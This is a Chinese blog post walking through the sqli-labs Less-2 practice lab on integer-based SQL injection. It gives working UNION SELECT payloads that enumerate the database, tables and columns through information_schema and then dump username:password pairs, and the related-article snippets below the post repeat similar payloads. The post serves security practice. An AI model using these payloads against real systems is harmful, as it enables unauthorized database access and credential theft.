less2整数型注入

最新推荐文章于 2024-07-29 16:48:37 发布
最新推荐文章于 2024-07-29 16:48:37 发布
阅读量295 收藏
点赞数
分类专栏: SQL注入 文章标签: 信息安全 sql 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42728957/article/details/110956177
版权

打开后发现与less1一样,提示请输入参数id,并为它赋一个数字值。
在这里插入图片描述

1、寻找注入点

输入?id=1正常;输入?id=1’报错,说明存在sql注入漏洞。
输入?id=1 and 1=1正常,输入?id=1 and 1=2页面显示不正常。
在这里插入图片描述
在这里插入图片描述

猜测查询语句如下:

SELECT * FROM users WHERE id=$id LIMIT 0,1

说明存在整型注入漏洞。与less1单引号字符型注入的区别在于,构建payload时去掉’单引号。

2、使用order by 查询字段数量

输入?id=1 order by 3 --+正常;
输入?id=1 order by 4 --+报错,说明该数据表中的字段数为3.

3、爆破数据库

?id=-1 union select 1,2,database() --+

在这里插入图片描述

4、爆破数据表

?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘security’
在这里插入图片描述

5、爆破数据列

?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’ --+
在这里插入图片描述
6、爆数据值

?id=-1 union select 1,2,group_concat(username,0x3a,password) from users--+

在这里插入图片描述
知识点:
0x3a是:16进制的分隔符,比如在爆数据值时,(username,0x3a,password)表示(username:password)。

橘子就酱
关注
专栏目录
yii2简单使用less代替css示例
10-20
Less是一种CSS预处理器,它扩展了CSS的功能,...在Yii2中使用Less而不是普通的CSS可以提高样式的可维护性和可扩展性。 首先,要在Yii2项目中使用Less,需要在composer.json文件中添加相应的组件。通过执行命令: ``` ...
Less-2 【数值
tubug的博客
05-20 427
到此闯关完成,闯关结束。
Sqli-labs靶场笔记2(Less-2~4 联合注入
m0_52233414的博客
04-01 193
sqli-labs的Less2到Less4三道题都可以用联合注入解决,所以放到一起来记录,联合注入的基本思路方法可以看我的上一篇,这里只针对题目来写。
整数型SQL注入
最新发布
qq_69100706的博客
07-29 204
在CTF(Capture The Flag)竞赛中,整数型SQL注入是一种常见的挑战类,尤其是在Web安全类的任务中。整数型注入发生在应用程序接受数字输入时,没有正确地验证或清理输入数据,导致恶意构造的数字可以被解释为SQL语句的一部分,从而执行额外的数据库查询。
sqli-labs靶场1-10关
Cobra的博客
04-05 363
Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符注入) 一、手工UNION联合查询注入 1、输入?id=1’发现报错,输入?id=1’-- -(-- -为注释符),页面回显正常,说明是单引号闭合注入。 2、爆数据库名 ?id=-1' union select 1,2,database() -- - (得到“security”数据库) 3、爆表名 ?id=-1' union select 1...
sqli-libs less1(union 字符注入)
weixin_42728957的博客
12-10 269
打开后,提示输入id并赋值 1、寻找注入点 输入?id=1返回数据,输入?id=1’报错,说明存在sql注入漏洞 根据报错信息,猜想输入参数的值被放到一对单引号之间。 猜测后台源码中存在类似于如下的数据库查询语句(可查看后台源码证实猜测): SELECT * FROM users WHERE id='$id' LIMIT 0,1 2、order by 查询该数据表中的字段数量 输入?id=1’ order by 3 --+ 正常; 输入?id=1’ order by 4 --+ 报错,说明该数据表中字
SQL注入】Less-2错误GET整注入
Mitchell_Donovan的博客
03-30 309
Less-2错误GET整注入 什么是整形注入?可以理解位提交的URL参数为整数类。 实验漏洞复现介绍 该实验与Less-1错误GET单引号字符注入 区别在于,构建payload时去掉'单引号 1、爆开数据库 payload ?id=0 union select 1,2,database() --+ 2、爆开数据表 payload ?id=0 union select 1,group_concat(table_name),3 from information_schema.ta
vue2中使用less简易教程
08-27
Vue2 中使用 Less 简易教程 Vue2 中使用 Less 是非常简单的,因为不需要手动配置 Webpack。只需要安装 Less 和 Less-loader 就可以了。在本教程中,我们将介绍如何在 Vue2 中使用 Less,并且详细解释每一个步骤。 ...
Less
01-07
Less基础 css存在的弊端 css是一门非程序式与语言,没有变量、函数、scope(作用域)等概念 css需要书写大量看似没有逻辑的代码,css冗余度是比较高的 不方便维护和扩展,不利于复用 css没有很好的计算能力 非前端...
less.js-windows.zip
07-12
在Windows环境下,为了方便地将Less编译成CSS,我们可以借助于Sublime Text的less2css插件,而"less.js-windows.zip"正是这个插件的安装包。 这个压缩包包含了以下关键文件: 1. **build.cmd**:这是一个批处理...
LESS2(sql注入
qq_44598397的博客
03-14 929
Less2 源码 输入:http://127.0.0.1/sqlilabs/Less-2/?id=2’ 输出错误: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server v ersion for the right syntax to use near ‘’ LIM...
sqil-labs sql注入 LESS2联合注入教程
m0_70787202的博客
03-19 180
less2联合注入教程
less知识点总结(一)
weixin_30590285的博客
06-21 142
1.unit 删除或更换单位。 参数: dimension: 带单位或不带单位的数字。 unit: (可选) 目标单位,如果省略此参数,则删除单位。 Seeconvertfor changing the unit without conversion. 案例:unit(5, px) 输出:5px 案例:unit(5em) 输出:5 2.ceil ...
sqli靶场通关之less2
sunxueer的博客
07-15 447
sqli靶场 less2 方法一:union联合查询 1. 求闭合字符 id=1 //无异常 id=1 and 1 =1 -- + //正确显示 id=1 and 1 =2 -- + //错误 说明有可能存在数字SQL注入 2. 求列数 id=1 order by 3 -- + id=1 order by 4 -- + 说明有3列 3. 求显示位 id=-1 union select 1,2,3 -- + 4. 爆数据库名 id=1 and 1=2 union select 1,
sqli-labs靶场第二关
gou1791241251的博客
12-19 757
传入id=1查看页面回显 第一步:判断注入。如字符,数值 传入单引号和双引号,或不传入参数进行测试。在末尾加入–+进行注入sql语句后面的代码 不传入单引号或双引号页面正常 第二步:判断表字段数 使用order by order by 3 时页面正常 order by 4时页面回显异常,所以有三个字段 第三步:使用联合查询获取数据库相关信息与查看页面回显位置 接下来查看数据库名和版本号 接下来通过mysql数据库中的information_schema数据中的tables表来查询所有
sql注入系列之Sqli-labs(less-2)
BetsyMyGirl的博客
11-30 1455
判断注入点 http://192.168.81.210/sqli/Less-2/?id=1’输入单引号发现出现了sql语句报错,可以知道单引号已经进入到数据库里执行了,语句类似于 select * from users where id =1' limit 0,1 因为正常的情况下,用户只能将搜索的参数传入到数据库里面进行查询,是不可能去修改查询语句的,上方的报错就是由于用户修改了查询的语句而引起的,将以上语句代入到自己的数据库里执行也是会报错的,因为多了一个单引号。 判断注入 输入1 and 1=1
Sqli-labs 基本注入篇 (Less1~22)
angry_program的博客
01-20 1878
前言 本blog作为练习笔记, 文笔不才, 仅供参考, 不正之处望大神指正。 基本注入篇对应labs的1~22关: 目录 Sqli-labs 基本注入篇 Less-1 单引号显错注入 一、手工注入 1. 判断字符整数型注入 2. 爆字段数 3. 爆库爆表爆字段 4. 取对应字段的值 二、sqlmap自动注入 1. 检测目标网站存在的注入漏洞类 2....
Less2css error 终极解决方案
weixin_30633507的博客
05-16 246
使用sublime Text3 的时候,安装less2Css后,和很多人一样以为大功告成,开始要运行编译less文件,结果开始发现      于是乎开始搜索问题和解决方案,然后就有了下面的解决方案1   方案1:通过window path +less.js-windows 的方式(网上可以快速找到这种解决的方式)   注意:window 操作系统下,经常会看到编译l...
mysql less2_Sqli labs系列-less-2 详细篇
weixin_39941792的博客
02-02 85
就今天晚上一个小插曲,瞬间感觉我被嘲讽了。SQL手工注入这个东西,杂说了吧,如果你好久不玩的话,一时说开了,你也只能讲个大概,有时候,长期不写写,你的构造语句还非常容易忘,要不我杂会被瞬间嘲讽了啊。。。好歹我也是上打过网络安全攻防平台,注入卡在第七关,我下玩过 web_for_pentester ,web渗透靶机2pentester_II_i386,这些靶场的小菜比。。。好了,不扯了,现在开始扯这...
sql注入less23
03-16
在less23中,它是一个用于演示SQL注入的示例网站。在该示例中,存在一个漏洞,攻击者可以通过在输入字段中插入恶意的SQL代码来绕过应用程序的验证和过滤机制,从而执行未经授权的数据库操作。 为了防止SQL注入攻击...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值